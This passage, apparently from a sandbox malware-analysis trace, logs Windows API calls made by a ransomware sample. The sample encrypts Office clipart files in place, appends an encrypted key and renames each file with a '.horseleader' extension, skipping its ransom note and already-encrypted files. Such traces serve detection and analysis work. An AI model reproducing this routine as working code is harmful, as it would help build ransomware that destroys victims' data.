lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.150] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.151] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.151] CloseHandle (hObject=0x158) returned 1 [0253.151] GetProcessHeap () returned 0x780000 [0253.151] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.151] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.horseleader") returned 79 [0253.151] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf.horseleader")) returned 1 [0253.156] GetProcessHeap () returned 0x780000 [0253.156] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.156] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcafbb900, ftCreationTime.dwHighDateTime=0x1bd4fa3, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcafbb900, ftLastWriteTime.dwHighDateTime=0x1bd4fa3, nFileSizeHigh=0x0, nFileSizeLow=0x3f34, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD00173_.WMF", cAlternateFileName="")) returned 1 [0253.156] lstrcmpiW (lpString1="BD00173_.WMF", lpString2="Windows") returned -1 [0253.156] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 67 [0253.156] StrStrIW (lpFirst="BD00173_.WMF", lpSrch=".horseleader") returned 0x0 [0253.156] lstrcmpW (lpString1="BD00173_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.156] lstrcmpW (lpString1="BD00173_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.156] lstrlenW (lpString=".testttjffg") returned 11 [0253.156] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.156] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.156] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.156] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.157] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 67 [0253.157] StrStrW (lpFirst="BD00173_.WMF", lpSrch=".txt") returned 0x0 [0253.157] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=16180) returned 1 [0253.157] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3f34, lpOverlapped=0x0) returned 1 [0253.160] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc0cc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.160] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3f34, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3f34, lpOverlapped=0x0) returned 1 [0253.160] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.161] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.161] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.161] CloseHandle (hObject=0x158) returned 1 [0253.161] GetProcessHeap () returned 0x780000 [0253.161] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.161] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.horseleader") returned 79 [0253.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf.horseleader")) returned 1 [0253.162] GetProcessHeap () returned 0x780000 [0253.162] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.162] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4354, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD05119_.WMF", cAlternateFileName="")) returned 1 [0253.162] lstrcmpiW (lpString1="BD05119_.WMF", lpString2="Windows") returned -1 [0253.162] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 67 [0253.163] StrStrIW (lpFirst="BD05119_.WMF", lpSrch=".horseleader") returned 0x0 [0253.163] lstrcmpW (lpString1="BD05119_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.163] lstrcmpW (lpString1="BD05119_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.163] lstrlenW (lpString=".testttjffg") returned 11 [0253.163] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.163] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.163] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.163] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.164] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 67 [0253.164] StrStrW (lpFirst="BD05119_.WMF", lpSrch=".txt") returned 0x0 [0253.164] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=17236) returned 1 [0253.164] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4354, lpOverlapped=0x0) returned 1 [0253.168] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffbcac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.168] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4354, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4354, lpOverlapped=0x0) returned 1 [0253.168] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.168] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.168] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.168] CloseHandle (hObject=0x158) returned 1 [0253.169] GetProcessHeap () returned 0x780000 [0253.169] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.169] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.horseleader") returned 79 [0253.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf.horseleader")) returned 1 [0253.170] GetProcessHeap () returned 0x780000 [0253.170] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.170] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3ef0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD06102_.WMF", cAlternateFileName="")) returned 1 [0253.170] lstrcmpiW (lpString1="BD06102_.WMF", lpString2="Windows") returned -1 [0253.170] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 67 [0253.170] StrStrIW (lpFirst="BD06102_.WMF", lpSrch=".horseleader") returned 0x0 [0253.170] lstrcmpW (lpString1="BD06102_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.170] lstrcmpW (lpString1="BD06102_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.170] lstrlenW (lpString=".testttjffg") returned 11 [0253.170] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.170] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.170] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.171] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.171] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 67 [0253.171] StrStrW (lpFirst="BD06102_.WMF", lpSrch=".txt") returned 0x0 [0253.171] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=16112) returned 1 [0253.171] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3ef0, lpOverlapped=0x0) returned 1 [0253.174] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc110, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.174] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3ef0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3ef0, lpOverlapped=0x0) returned 1 [0253.174] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.174] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.174] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.174] CloseHandle (hObject=0x158) returned 1 [0253.174] GetProcessHeap () returned 0x780000 [0253.174] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.175] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.horseleader") returned 79 [0253.175] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf.horseleader")) returned 1 [0253.176] GetProcessHeap () returned 0x780000 [0253.176] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.176] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4124, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD06200_.WMF", cAlternateFileName="")) returned 1 [0253.176] lstrcmpiW (lpString1="BD06200_.WMF", lpString2="Windows") returned -1 [0253.176] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 67 [0253.176] StrStrIW (lpFirst="BD06200_.WMF", lpSrch=".horseleader") returned 0x0 [0253.176] lstrcmpW (lpString1="BD06200_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.176] lstrcmpW (lpString1="BD06200_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.176] lstrlenW (lpString=".testttjffg") returned 11 [0253.176] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.176] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.176] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.176] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.178] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 67 [0253.178] StrStrW (lpFirst="BD06200_.WMF", lpSrch=".txt") returned 0x0 [0253.178] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=16676) returned 1 [0253.178] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4124, lpOverlapped=0x0) returned 1 [0253.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffbedc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.180] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4124, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4124, lpOverlapped=0x0) returned 1 [0253.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.181] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.181] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.181] CloseHandle (hObject=0x158) returned 1 [0253.181] GetProcessHeap () returned 0x780000 [0253.181] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.181] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.horseleader") returned 79 [0253.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf.horseleader")) returned 1 [0253.182] GetProcessHeap () returned 0x780000 [0253.182] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.182] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x687c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD07761_.WMF", cAlternateFileName="")) returned 1 [0253.182] lstrcmpiW (lpString1="BD07761_.WMF", lpString2="Windows") returned -1 [0253.182] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 67 [0253.182] StrStrIW (lpFirst="BD07761_.WMF", lpSrch=".horseleader") returned 0x0 [0253.183] lstrcmpW (lpString1="BD07761_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.183] lstrcmpW (lpString1="BD07761_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.183] lstrlenW (lpString=".testttjffg") returned 11 [0253.183] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.183] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.183] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.183] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.183] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 67 [0253.183] StrStrW (lpFirst="BD07761_.WMF", lpSrch=".txt") returned 0x0 [0253.184] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=26748) returned 1 [0253.184] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.187] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.187] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.187] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x187c, lpOverlapped=0x0) returned 1 [0253.187] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe784, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.187] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x187c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x187c, lpOverlapped=0x0) returned 1 [0253.187] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.188] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.188] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.188] CloseHandle (hObject=0x158) returned 1 [0253.188] GetProcessHeap () returned 0x780000 [0253.188] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.188] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.horseleader") returned 79 [0253.188] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf.horseleader")) returned 1 [0253.189] GetProcessHeap () returned 0x780000 [0253.189] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.189] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x133c, 